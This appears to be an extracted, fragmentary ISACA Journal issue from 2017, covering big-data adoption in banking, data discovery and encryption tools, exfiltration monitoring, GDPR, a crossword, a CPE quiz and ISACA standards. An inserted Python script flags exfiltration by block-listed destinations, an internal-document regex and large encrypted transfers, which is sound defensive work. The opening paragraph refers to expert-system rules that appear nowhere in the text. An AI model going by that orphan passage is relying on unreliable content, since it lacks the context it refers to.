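Running it on the constructed facts takes four cycles: rule 9 fires first (rule 10 is then dropped from the conflict set because its consequent is already in memory), then rules 14, 15 and 16 add the three remediation sub-goals the text lists. A fully validated input produces an empty trace, which is the check an auditor would expect the expert system to make.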
ALGORITHMIC MODELS AND THEIR SUBSEQUENT…

$$
s = \sqrt{\frac{1}{N-1}\sum_{i=1}^{N}\left(x_i - \bar{x}\right)^2}
$$

Figure 2—Overfitting (Source: F. Pedregosa, et al. Reprinted with permission.)

Figure (stages of big data implementation): Definition, Identification, Recognition, Analysis, Ploughing, Training.
…through alternative channels, such as automated teller machines (ATMs) and mobile banking, where large chunks of data are exchanged. It will not make any sense to want to treat all data from all fronts the same way and at the same time. It is necessary for banks to define the scope of big data implementation to be covered in order to get meaningful information from the data.

Identification of Skill Set

After developing a successful definition of boundaries in which to work, it is necessary to identify human resources needed with the required skill set. Careful selection of manpower with the requisite skills is very important before a successful big data implementation. Banks should note that this should not be seen as residing in only one department of the bank. Experienced staff should be picked from operations, marketing, control and other departments to contribute their input for successful implementation. A rich blend of skilled people will go a long way to determine the success of an implementation.

Recognition of Data Sources

Effective data tracking and measurement stem from identified data sources. It has been said that if it cannot be measured, then it cannot be controlled. Each data source must be listed, although not all of them can be handled at once. Then, based on the defined scope, data from the identified sources can be prepared for the next stage.

Analysis of Output

Analysis is the stage where data within the scope are reviewed for relevant information for management use. Both structured and unstructured…
It should be stated explicitly that the specifics of the data a given organization might wish to locate will vary based on the organization itself. While discovery and inventory of sensitive data are important regardless, the specifics of the data (and, therefore, the specific tools an organization might employ to find the data) are different based on the type of organization and the specific considerations it has.

This means that tools that support discovery and inventorying of data can directly assist practitioners in a few ways:

1. By helping them verify that other controls are performing as expected
2. By building out a “map” of where sensitive data live throughout the organization

Once this is complete, the tools can also be run periodically in ad hoc fashion to find and flag situations where data have been stored or transmitted to an unexpected location.

It should be noted that there are a few different categories of tools that can help in this regard:

• Commercial data discovery tools, which assist organizations in finding, collecting and consolidating data stores for business intelligence or advanced analytics purposes
• Data leak prevention (DLP) tools, which can be used in an ongoing way to find and flag data that should not be stored or transmitted through certain channels based on business…

…(IaaS), and in application programming interfaces (APIs) or other services for Platform as a Service (PaaS) implementations.

Data Encryption

There are also tools that help practitioners encrypt data where the data are stored or transmitted. It should be noted that there are absolutely any number of special-purpose encryption tools out there that can be directly employed or adapted to encrypt data at any level of the Open Systems Interconnection (OSI) stack—at the application layer, at the file system layer, for data in transit, etc. It is always the better option to systematically and holistically address encryption use, applying it in combination with something like a formalized threat modeling exercise to protect against known, analyzed and thought-through threat scenarios. Such systematic analysis is the ideal case.

However, because the ideal case is not always the actual case in every organization, it is worth noting that practitioners have data encryption options even in the absence of that broader investment. First and foremost, most modern operating systems have file system encryption options built into them. In combination with data discovery and a reliable inventory, tools are often available natively on the operating system platform used within the enterprise. This includes tools such as BitLocker (Windows), eCryptfs or LUKS (Linux), and others on a platform-by-platform basis. Likewise, database and middleware software can sometimes support encryption natively within it.

Many cloud service provider (CSP) storage and computing implementations…

Exfiltration

There are many tools that the organization may already have in place that can be used to detect and alert on potential exfiltration activity. Any network monitoring device (e.g., firewall or intrusion detection systems [IDS]) can potentially be adapted to help provide value for an exfiltration scenario. Firewalls or HTTP forward proxies can be employed to look for suspicious outbound connections (e.g., entities that are on IP black lists). IDS devices can do this and also potentially be adapted to trigger on custom regular expressions that might correspond to sensitive internal information.

One important thing to note is that, for the purposes of exfiltration, many attackers will employ encrypted channels such as Transport Layer Security (TLS), Secure Shell (SSH) or even nonstandard encrypted communications techniques. Therefore, while potentially a valuable addition, it cannot be assumed that an IDS (monitoring, as it does, plaintext traffic) will necessarily always be able to detect this activity. As such, keeping an eye out for suspicious connections is a useful step, whether or not the organization also employs an IDS to detect exfiltration.
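The three exfiltration checks the column describes (block-listed destinations, a custom regular expression for sensitive internal information, and the limit that encrypted channels place on content inspection) can be combined in one egress review. The following Python is an added example, not a tool from the column or from ISACA: it runs those checks over constructed connection log lines. The log format, the `ACME-CONF-` marker pattern, the block list entries (RFC 5737 documentation addresses) and the 10 MiB volume threshold are all assumptions of this example.

```python
"""Egress review over constructed connection log lines (added example).

Destinations on a block list are flagged whatever the protocol. A custom
regular expression for an internal data marker is applied only to plaintext
protocols, because that is all a plaintext IDS can read. Encrypted flows get
no content check; the only signal left is destination and volume, so large
encrypted transfers are surfaced for review instead.
"""
import ipaddress
import re

# Constructed sample: timestamp, source, destination, protocol, bytes out, payload.
# Addresses use RFC 5737 documentation ranges; nothing here is a real indicator.
SAMPLE_LOG = """\
2017-11-02T10:01:12Z 10.0.0.15 203.0.113.10 http 812 GET /news/index.html
2017-11-02T10:02:40Z 10.0.0.22 203.0.113.77 http 2048 POST /upload body=ACME-CONF-2017-0042 quarterly figures
2017-11-02T10:03:05Z 10.0.0.22 198.51.100.9 tls 9388212 -
2017-11-02T10:04:11Z 10.0.0.31 203.0.113.5 ssh 10240 -
2017-11-02T10:05:30Z 10.0.0.40 203.0.113.200 tls 52428800 -
"""

# Constructed block list and marker. A real deployment would load these from
# the organization's threat intelligence feeds and data classification inventory.
BLOCKLIST = {ipaddress.ip_address("198.51.100.9")}
INTERNAL_MARKER = re.compile(r"\bACME-CONF-\d{4}-\d{4}\b")
PLAINTEXT_PROTOCOLS = {"http", "ftp", "smtp"}
LARGE_TRANSFER_BYTES = 10 * 1024 * 1024  # 10 MiB; an assumed threshold, tune per environment


def parse_line(line):
    """Split one log line into a record; the payload may itself contain spaces."""
    ts, src, dst, proto, nbytes, payload = line.split(" ", 5)
    return {"ts": ts, "src": src, "dst": ipaddress.ip_address(dst),
            "proto": proto, "bytes": int(nbytes), "payload": payload}


def review_connection(rec):
    """Return the list of reasons (possibly empty) this connection merits review."""
    reasons = []
    if rec["dst"] in BLOCKLIST:
        reasons.append("blocklisted_destination")
    if rec["proto"] in PLAINTEXT_PROTOCOLS:
        if INTERNAL_MARKER.search(rec["payload"]):
            reasons.append("internal_marker_in_plaintext")
    elif rec["bytes"] >= LARGE_TRANSFER_BYTES:
        # Content is opaque to a plaintext IDS; judge on volume instead.
        reasons.append("encrypted_large_transfer")
    return reasons


def review_log(text):
    """Run review_connection over every non-empty line; keep only the hits."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        reasons = review_connection(rec)
        if reasons:
            findings.append({"src": rec["src"], "dst": str(rec["dst"]),
                             "proto": rec["proto"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in review_log(SAMPLE_LOG):
        print(finding)
```

On the sample, the plaintext upload is caught by the marker pattern, the TLS session to the block-listed address is caught by destination alone even though its content is unreadable, and the 50 MiB TLS transfer is surfaced purely on volume. The small SSH session produces nothing, which illustrates the column's caveat: a moderate amount of data over an encrypted channel to an unlisted destination is invisible to this kind of check, so destination monitoring complements rather than replaces an IDS.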
Q: The European Union (EU) General Data Protection Regulation (GDPR) will take effect in May 2018. My organization is not doing any business in Europe currently, but we have plans to expand. How will GDPR affect us? Will it affect us if we do not have an office in Europe?

A: GDPR (Regulation [EU] 2016/679) is a regulation by which the European Parliament, the Council of the European Union and the European Commission intend to strengthen and unify data protection for all individuals within the European Union. It also addresses the export of personal data outside the European Union for processing. The primary objective of the GDPR is to give assurance to EU citizens that their personal data are processed in a secure environment and have adequate legal protection. The regulation was adopted on 27 April 2016. It will be enforceable beginning on 25 May 2018 after a two-year transition period. Unlike a directive, it does not require any enabling legislation to be passed by national governments; thus, it is directly binding and applicable.

The new EU data protection regime extends the scope of the EU data protection law to all foreign organizations processing the data of EU residents. It provides for a harmonization of the data protection regulations throughout the European Union, thereby making it easier for non-European companies to comply with these regulations. However, this comes at the cost of a strict data protection compliance regime with severe penalties of up to 4 percent of worldwide turnover or upper limit of £20 million, whichever is higher.2

Some facts about GDPR include:3

• If a business is not in the European Union, it still must comply with the regulation if it is processing the personal data of EU citizens outside the EU’s geographical boundaries.
• The definition of “personal data” is broader, bringing more data into the regulated perimeter.
• Consent will be necessary for processing children’s data.
by Myles Mellor
www.themecrosswords.com

ACROSS
1. Type of shared site
6. Protocol for data transfer
8. Contract between service provider and end user
9. Berners-Lee invention
10. Sources of danger
12. Computer programming language for statistical analysis, abbr.
13. Lawyer’s org.
14. Bit of binary code
15. Have legal control of
16. Incomprehensible
18. Milliliter, abbr.
19. Geometric art style
20. Spelling contest
22. Destroyed
25. Memory
26. Intersected
27. NASA term for a spacewalk, abbr.
28. Restoring a system after an attack or crash
31. Establish
32. CISAs work with this department during audits
33. Tick off
35. ___ standstill (motionless)
36. Mainframe component
37. Malicious software that demands payment with a threat
40. Placed
41. Web address ender
42. Early operating system
43. Single- prefix
44. Containing errors, as a file or system
46. Making something known
47. The heart of a Ted Talk

DOWN
1. Physical control
2. Contract for temporary use
3. Arrangement of displays to monitor a system
4. Preeminent industrialist
5. Period of time when a system is nonfunctioning
6. Stop functioning, as a system
7. Presented, as a problem
11. Create a new path for
17. Land areas
18. Office message
20. Data duplications for security
21. Science of investigation of evidence found in computer systems
23. Online party announcement
24. Information
25. Memo start
28. Diminished gradually
29. The V in VM
30. Historical chapter
34. Agree
35. Contended
38. Standalone malware computer program that replicates itself
39. Flightboard abbreviation
45. Drink that is served hot or cold

Answers on page 58
TRUE OR FALSE

SATHIYAMURTHY ARTICLE
1. Despite its explicit support of privacy and data protection by design as a legal obligation, the EU General Data Protection Regulation (GDPR) is not among the most commonly used frameworks for managing privacy, according to ISACA’s 2014 Privacy Survey.
2. Human biases and national sensitivities have an impact on the definition of private information and associated privacy expectations.
3. When organizations are creating products and solutions and are faced with prioritizing privacy protection against business objectives (such as speed to market), they will generally place a higher priority on business objectives.

CARON ARTICLE
4. Immutability, or a single version of the truth, is a benefit to blockchain technology because it contributes to reducing the asymmetry between the networked entities engaged in a transaction.
5. Storage of the cryptographic keys that are used as digital signatures constitutes a security weakness for blockchain.
6. In the United States, blockchain solutions that are used for sharing and recording patient records are not subject to the US Health Insurance Portability and Accountability Act (HIPAA).

KELLY ARTICLE
7. Executive buy-in is critical to an enterprisewide security program, and one way to appeal to executives is by communicating the program’s benefits in terms of their specific pain points.
8. Although it is important to raise security awareness among employees, it is not as important as focusing on external malicious actors, because less than half of cyberattacks are carried out by insiders, according to the IBM X-Force 2016 Cyber Security Intelligence Index.
9. An acceptable-use policy should clearly define who owns mobile devices and what access the enterprise has to the data on those devices.

BRADFORD AND HENDERSON ARTICLE
10. Research indicates that barriers to a system’s use dissuade users, but when those barriers disappear, their absence encourages use.
11. According to the research presented in the article, financial auditors find generalized audit software (GAS) much easier to use than do other auditors.
12. Two factors that encourage the use of GAS are perceived ease of use and perceived usefulness.
13. The authors’ research indicates that internal auditors perceive less threat from using GAS than do external auditors.

WERNEBURG ARTICLE
14. The impact that data breaches have on the individuals whose personal information is compromised is considered a secondary risk factor, rather than a proximate risk factor.
15. Regulatory requirements and service audit systems such as Service Organization Control (SOC) 2 specify that an application vulnerability scan should be performed at least annually and the report shared with the client.
16. Budget, differing priorities and conflicting objectives are just a few reasons a client may not want to deal with security fixes.

MUKUNDHAN ARTICLE
17. According to PricewaterhouseCoopers (PwC), between 30 and 50 billion devices will be connected to the Internet by the year 2020.
18. When a client requests a connection to the server via a SYN message and the server responds with ACK, that is a Transmission Control Protocol (TCP) three-way handshake.
19. The 2016 coordinated distributed denial-of-service (DDoS) attack on DYN was initiated by the Mirai botnet—a cluster of approximately 100,000 enslaved Internet of Things (IoT) devices delivering different types of DDoS attacks.
20. IoT devices are widely known to take a strong stance on security, which they demonstrate through such regular practices as unguessable passwords, secured ports and regularly updated firmware.
Quizzes may be submitted for grading only by current Journal subscribers. An electronic version of the quiz is available at www.isaca.org/cpequiz; it is graded online and is available to all interested parties. If choosing to submit using this print copy, please email, fax or mail your answers for grading. Return your answers and contact information by email to info@isaca.org or by fax to +1.847.253.1755. If you prefer to mail your quiz, in the US, send your CPE Quiz along with a stamped, self-addressed envelope, to ISACA International Headquarters, 3701 Algonquin Rd., #1010, Rolling Meadows, IL 60008 USA. Outside the US, ISACA will pay the postage to return your graded quiz. You need only to include an envelope with your address. You will be responsible for submitting your credit hours at year-end for CPE credits. A passing score of 75 percent will earn one hour of CISA, CRISC, CISM or CGEIT CPE credit.

Please confirm with other designation-granting professional bodies for their CPE qualification acceptance criteria.

Answers: Crossword by Myles Mellor. See page 56 for the puzzle. (Answer grid not recoverable from this extraction.)
ISACA Member and Certification Holder Compliance

The specialized nature of information systems (IS) audit and assurance and the skills necessary to perform such engagements require standards that apply specifically to IS audit and assurance. The development and dissemination of the IS audit and assurance standards are a cornerstone of the ISACA® professional contribution to the audit community.

IS audit and assurance standards define mandatory requirements for IS auditing. They report and inform:
• IS audit and assurance professionals of the minimum level of acceptable performance required to meet the professional responsibilities set out in the ISACA Code of Professional Ethics
• Management and other interested parties of the profession’s expectations concerning the work of practitioners
• Holders of the Certified Information Systems Auditor® (CISA®) designation of requirements. Failure to comply with these standards may result in an investigation into the CISA holder’s conduct by the ISACA Board of Directors or appropriate committee and, ultimately, in disciplinary action.

ITAF™, 3rd Edition (www.isaca.org/itaf) provides a framework for multiple levels of guidance:

IS Audit and Assurance Standards

The standards are divided into three categories:
• General standards (1000 series)—Are the guiding principles under which the IS assurance profession operates. They apply to the conduct of all assignments and deal with the IS audit and assurance professional’s ethics, independence, objectivity and due care as well as knowledge, competency and skill.
• Performance standards (1200 series)—Deal with the conduct of the assignment, such as planning and supervision, scoping, risk and materiality, resource mobilization, supervision and assignment management, audit and assurance evidence, and the exercising of professional judgment and due care.
• Reporting standards (1400 series)—Address the types of reports, means of communication and the information communicated.

General
1001 Audit Charter
1002 Organizational Independence
1003 Professional Independence
1004 Reasonable Expectation
1005 Due Professional Care
1006 Proficiency
1007 Assertions
1008 Criteria

Performance
1201 Engagement Planning
1202 Risk Assessment in Planning
1203 Performance and Supervision
1204 Materiality
1205 Evidence
1206 Using the Work of Other Experts
1207 Irregularity and Illegal Acts

Reporting
1401 Reporting
1402 Follow-up Activities

IS Audit and Assurance Guidelines

The guidelines are designed to directly support the standards and help practitioners achieve alignment with the standards. They follow the same categorization as the standards (also divided into three categories):
• General guidelines (2000 series)
• Performance guidelines (2200 series)
• Reporting guidelines (2400 series)

General
2001 Audit Charter
2002 Organizational Independence
2003 Professional Independence
2004 Reasonable Expectation
2005 Due Professional Care
2006 Proficiency
2007 Assertions
2008 Criteria

Performance
2201 Engagement Planning
2202 Risk Assessment in Planning
2203 Performance and Supervision
2204 Materiality
2205 Evidence
2206 Using the Work of Other Experts
2207 Irregularity and Illegal Acts
2208 Sampling

Reporting
2401 Reporting
2402 Follow-up Activities

IS Audit and Assurance Tools and Techniques

These documents provide additional guidance for IS audit and assurance professionals and consist, among other things, of white papers, IS audit/assurance programs, reference books and the COBIT® 5 family of products. Tools and techniques are listed under www.isaca.org/itaf.

Please note that the guidelines are effective 1 September 2014.

An online glossary of terms used in ITAF is provided at www.isaca.org/glossary.

Prior to issuing any new standard or guideline, an exposure draft is issued internationally for general public comment.

Comments may also be submitted to the attention of the Director, Thought Leadership and Research via email (standards@isaca.org); fax (+1.847.253.1755) or postal mail (ISACA International Headquarters, 3701 Algonquin Road, Suite 1010, Rolling Meadows, IL 60008-3105, USA).

Links to current and exposed ISACA Standards, Guidelines, and Tools and Techniques are posted at www.isaca.org/standards.

Disclaimer: ISACA has designed this guidance as the minimum level of acceptable performance required to meet the professional responsibilities set out in the ISACA Code of Professional Ethics. ISACA makes no claim that use of these products will assure a successful outcome. The guidance should not be considered inclusive of any proper procedures and tests or exclusive of other procedures and tests that are reasonably directed to obtaining the same results. In determining the propriety of any specific procedure or test, the control professionals should apply their own professional judgment to the specific control circumstances presented by the particular systems or IS environment.
…supporters, leaders and advertisers. They may differ from policies and official statements of ISACA and/or the IT Governance Institute and their committees, and from opinions endorsed by authors, employers or the editors of the Journal. ISACA Journal does not attest to the originality of authors’ content.

© 2017 ISACA. All rights reserved.

Instructors are permitted to photocopy isolated articles for noncommercial classroom use without fee. For other copying, reprint or republication, permission must be obtained in writing from the association. Where necessary, permission is granted by the copyright owners for those registered with the Copyright Clearance Center (CCC) (www.copyright.com), 27 Congress St., Salem, MA 01970, to photocopy articles owned by ISACA, for a flat fee of US $2.50 per article plus 25¢ per page. Send payment to the CCC stating the ISSN (1944-1967), date, volume, and first and last page number of each article. Copying for other than personal use or internal reference, or of articles or columns not owned by the association without express permission of the association or the copyright owner is expressly prohibited.

ISSN 1944-1967

Subscription Rates: US: one year (6 issues) $75.00. All international orders: one year (6 issues) $90.00. Remittance must be made in US funds.

Editor: Jennifer Hajigeorgiou, publication@isaca.org
Managing Editor: Maurita Jasper
Assistant Editor: Safia Kazi
Contributing Editors: Sunil Bakshi, CISA, CRISC, CISM, CGEIT, ABCI, AMIIB, BS 25999 LI, CEH, CISSP, ISO 27001 LA, MCA, PMP; Ian Cooke, CISA, CRISC, CGEIT, COBIT Foundation, CFE, CPTS, DipFM, ITIL Foundation, Six Sigma Green Belt; Ed Moyle; Vasant Raval, DBA, CISA; Steven J. Ross, CISA, CBCP, CISSP
Advertising: media@isaca.org
Media Relations: news@isaca.org

Reviewers: Matt Altman, CISA, CRISC, CISM, CGEIT; Sanjiv Agarwala, CISA, CISM, CGEIT, CISSP, ITIL, MBCI; Vikrant Arora, CISM, CISSP; Cheolin Bae, CISA, CCIE; Sunil Bakshi, CISA, CRISC, CISM, CGEIT, ABCI, AMIIB, BS 25999 LI, CEH, CISSP, ISO 27001 LA, MCA, PMP; Brian Barnier, CRISC, CGEIT; Pascal A. Bizarro, CISA; Jerome Capirossi, CISA; Anand Choksi, CISA, CCSK, CISSP, PMP; Joyce Chua, CISA, CISM, PMP, ITILv3; Ashwin K. Chaudary, CISA, CRISC, CISM, CGEIT; Burhan Cimen, CISA, COBIT Foundation, ISO 27001 LA, ITIL, PRINCE2; Ken Doughty, CISA, CRISC, CBCP; Nikesh L. Dubey, CISA, CRISC, CISM, CISSP; Ross Dworman, CISM, GSLC; Robert Findlay; John Flowers, CISA, CRISC; Jack Freund, Ph.D., CISA, CRISC, CISM, CIPP, CISSP, PMP; Sailesh Gadia, CISA; Amgad Gamal, CISA, COBIT Foundation, CEH, CHFI, CISSP, ECSA, ISO 2000 LA/LP, ISO 27000 LA, MCDBA, MCITP, MCP, MCSE, MCT, PRINCE2; Robin Generous, CISA, CPA; Tushar Gokhale, CISA, CISM, CISSP, ISO 27001 LA; Tanja Grivicic; Manish Gupta, Ph.D., CISA, CRISC, CISM, CISSP; Mike Hansen, CISA, CFE; Jeffrey Hare, CISA, CPA, CIA; Sherry G. Holland; Jocelyn Howard, CISA, CISMP, CISSP; Francisco Igual, CISA, CGEIT, CISSP; Jennifer Inserro, CISA, CISSP; Khawaja Faisal Javed, CISA, CRISC, CBCP, ISMS LA; Mohammed J. Khan, CISA, CRISC, CIPM; Farzan Kolini, GIAC; Abbas Kudrati, CISA, CISM, CGEIT, CEH, CHFI, EDRP, ISMS; Shruti Kulkarni, CISA, CRISC, CCSK, ITIL; Bhanu Kumar; Hiu Sing (Vincent) Lam, CISA, CPIT(BA), ITIL, PMP; Edward A. Lane, CISA, CCP, PMP; Romulo Lomparte, CISA, CRISC, CISM, CGEIT, COBIT 5 Foundation, CRMA, IATCA, IRCA, ISO 27002, PMP; Larry Marks, CISA, CRISC, CGEIT; Tamer Marzouk, CISA, ABCP, CBAP; Krysten McCabe, CISA; Brian McLaughlin, CISA, CRISC, CISM, CIA, CISSP, CPA; Brian McSweeney; Irina Medvinskaya, CISM, FINRA, Series 99; David Earl Mills, CISA, CRISC, CGEIT, MCSE; Robert Moeller, CISA, CISSP, CPA, CSQE; David Moffatt, CISA, PCI-P; Ramu Muthiah, CISM, CRVPM, GSLC, ITIL, PMP; Ezekiel Demetrio J. Navarro, CPA; Jonathan Neel, CISA; Nnamdi Nwosu, CISA, CRISC, CISM, CGEIT, PfMP, PMP; Anas Olateju Oyewole, CISA, CRISC, CISM, CISSP, CSOE, ITIL; David Paula, CISA, CRISC, CISSP, PMP; Pak Lok Poon, Ph.D., CISA, CSQA, MIEEE; John Pouey, CISA, CRISC, CISM, CIA; Steve Primost, CISM; Parvathi Ramesh, CISA, CA; Antonio Ramos Garcia, CISA, CRISC, CISM, CDPP, ITIL; Michael Ratemo, CISA, CRISC, CISM, CSXF, ACDA, CIA, CISSP, CRMA; Sheri L. Rawlings, CGEIT; Ron Roy, CISA, CRP; Louisa Saunier, CISSP, PMP, Six Sigma Green Belt; Daniel Schindler, CISA, CIA; Sandeep Sharma; Catherine Stevens, ITIL; Johannes Tekle, CISA, CFSA, CIA; Robert W. Theriot Jr., CISA, CRISC; Nancy Thompson, CISA, CISM, CGEIT, PMP; Smita Totade, Ph.D., CISA, CRISC, CISM, CGEIT; Jose Urbaez, CISA, CRISC, CISM, CGEIT, CSXF, ITIL; Ilija Vadjon, CISA; Sadir Vanderloot Sr., CISA, CISM, CCNA, CCSA, NCSA; Varun Vohra, CISA, CISM; Manoj Wadhwa, CISA, CISM, CISSP, ISO 27000, SABSA; Anthony Wallis, CISA, CRISC, CBCP, CIA; Kevin Wegryn, PMP, Security+, PfMP; Tashi Williamson; Ellis Wong, CISA, CRISC, CFE, CISSP

ISACA Board of Directors (2017-2018)
Chair: Theresa Grafenstine, CISA, CRISC, CGEIT, CGAP, CGMA, CIA, CPA
Vice-chair: Rob Clyde, CISM
Director: Brennan Baybeck, CISA, CRISC, CISM, CISSP
Director: Zubin Chagpar, CISA, CISM, PMP
Director: Peter Christiaans, CISA, CRISC, CISM, PMP
Director: Hironori Goto, CISA, CRISC, CISM, CGEIT
Director: Michael Hughes, CISA, CRISC, CGEIT
Director: Leonard Ong, CISA, CRISC, CISM, CGEIT, CFE, CIPM, CIPT, CPP, CISSP ISSMP-ISSAP, CITBCM, CSSLP, GCFA, GCIA, GCIH, GSNA, PMP
Director: R. V. Raghu, CISA, CRISC
Director: Jo Stewart-Rattray, CISA, CRISC, CISM, CGEIT
Director: Ted Wolff, CISA
Director: Tichaona Zororo, CISA, CRISC, CISM, CGEIT, COBIT Assessor and Trainer, CIA, CRMA
Director and Chief Executive Officer: Matthew S. Loeb, CGEIT, CAE, FASAE
Director and Past Chair: Christos Dimitriadis, Ph.D., CISA, CRISC, CISM, ISO 20000 LA
Director and Past Chair: Robert E Stroud, CRISC, CGEIT
Director and Past Chair: Tony Hayes, CGEIT, AFCHSE, CHE, FACS, FCPA, FIIA
ISACA BOOKSTORE
RESOURCES FOR YOUR
PROFESSIONAL DEVELOPMENT
www.isaca.org/bookstore
Browse a variety of publications featuring the latest research and expert thinking on standards,
best practices, emerging trends and more at isaca.org/bookstore S-1
Featured Exam Prep Materials
CISA® Review Manual, 26th Edition CISA® Review Questions, Answers & Explanations
The CISA® Review Manual, 26th Edition is a comprehensive Manual, 11th Edition
reference guide designed to help individuals prepare for the CISA Designed to familiarize candidates with the question types and
exam and understand the roles and responsibilities of an information topics featured in the CISA exam, the CISA® Review Questions,
systems (IS) auditor. The manual has been revised according to Answers & Explanations Manual, 11th Edition consists of 1,000
the 2016 CISA Job Practice and represents the most current, multiple-choice study questions that have previously appeared in
comprehensive, peer-reviewed IS audit, assurance, security and the CISA® Review Questions, Answers & Explanations Manual 2015
control resource available. and the CISA® Review Questions, Answers & Explanations Manual
2015 Supplement. The manual has been updated according to the
The 26th edition is organized to assist candidates in understanding
newly revised 2016 Job Practice.
essential concepts and studying the following job practice areas:
The Process of Auditing Information Systems; Governance and Many questions have been revised or completely rewritten
Management of IT; Information Systems Acquisition, Development to be more representative of the CISA exam question format and/or
and Implementation; Information Systems Operations, Maintenance to provide further clarity or explanation of the correct answer. These
and Service Management; Protection of Information Assets. questions are not actual exam items but are intended to provide
CISA candidates with an understanding of the type and structure of
The manual also serves as an effective
questions and content that have previously appeared on the exam.
desk reference for IS auditors.
This publication is ideal to use in conjunction with the:
•
CISA® Review Manual, 26th Edition
Member: US $105.00
Non-member: US $135.00 • CISA® Review Questions, Answers & Explanations
Print Product Code: CRM26ED Database – 12 Month Subscription
eBook Product Code: EPUB_CRM26ED
Member: US $120.00
Non-member: US $156.00
Product Code: QAE11ED
NEW!
CISM® Review Manual, 15th Edition
CRISC™ Review Questions, Answers & Explanations The CISM® Review Manual, 15th Edition is designed to help you
Manual, 5th Edition prepare for the CISM® exam. This comprehensive, easy-to-navigate
manual is organized into chapters that correspond to the four job
The CRISC™ Review Questions, Answers & Explanations Manual, practice areas covered in the CISM exam. The Manual is primarily
5th Edition has been expanded and updated to include even designed as a tool for exam prep, but can also be useful as a
more practice questions. This study aid is designed to familiarize reference manual for information security managers.
candidates with the question types and topics featured in the CRISC
exam with the use of 550 questions. New to the 15th Edition:
Many questions have been revised or completely rewritten to be • In Practice Questions help you explore the concepts in the
more representative of the current CRISC exam question format, CISM Review Manual in your own practice.
and/or to provide further clarity or explanation of the correct answer. • Knowledge Checks are designed to help reinforce important
These questions are not actual exam items, but are intended to concepts from the Review Manual to further enhance your
provide CRISC candidates with an understanding of the type and learning.
structure of questions and content that have previously appeared • Case Studies provide real-world scenarios to help you gain a
on the exam. practical perspective on the Review Manual content and how it
relates to the CISM’s practice.
Member: US $72.00 • Comprehensive Index has been updated to make navigating
CRISC Review Questions, Answers & Explanations Manual 5th Edition
Non-member: US $96.00
the Review Manual easier and more intuitive.
Product Code: CRQ5ED
CISM
3701 Algonquin Road | Suite 1010
Rolling Meadows, IL 60008 | USA
P: +1.847.253.1545
F: +1.847.253.1443
E: info@isaca.org
isaca.org
NEW!

The database is available via the web, allowing our CISM candidates to log in at home, at work or anywhere they have Internet connectivity. The database is Mac and Windows compatible.

Exam candidates can take sample exams with randomly selected questions and view the results by job practice domain, allowing for concentrated study in particular areas. Additionally, questions generated during a study session are sorted based on previous scoring history, allowing CISM candidates to identify their strengths and weaknesses and focus their study efforts accordingly.
Member: US $185.00
Non-member: US $225.00
Product Code: XMXCM15-12M
CGEIT® Review Manual, 7th Edition

The CGEIT® Review Manual, 7th Edition is designed to help individuals prepare for the CGEIT exam and understand the responsibilities of those who implement or manage the governance of enterprise IT (GEIT) or have significant advisory or assurance responsibilities in regards to GEIT. It is a detailed reference guide that has been developed and reviewed by subject matter experts actively involved in governance of enterprise IT worldwide.

The manual is organized to assist candidates in understanding essential concepts and studying the following updated job practice areas:

• Framework for the governance of enterprise IT
• Strategic management
• Benefits realization
• Risk optimization
• Resource optimization

CGEIT® Review Questions, Answers & Explanations Manual, 4th Edition

The CGEIT® Review Questions, Answers & Explanations Manual, 4th Edition is designed to familiarize candidates with the question types and topics featured in the CGEIT exam.

The 250 questions in this manual have been consolidated from the CGEIT® Review Questions, Answers & Explanations Manual, 2015 and the CGEIT® Review Questions, Answers & Explanations Manual, 2015 Supplement.

Many questions have been revised or completely rewritten to be more representative of the CGEIT exam question format and/or to provide further clarity or explanation of the correct answer. These questions are not actual exam items but are intended to provide CGEIT candidates with an understanding of the type and structure of questions and content that has previously appeared on the exam. This publication is ideal to use in conjunction with the: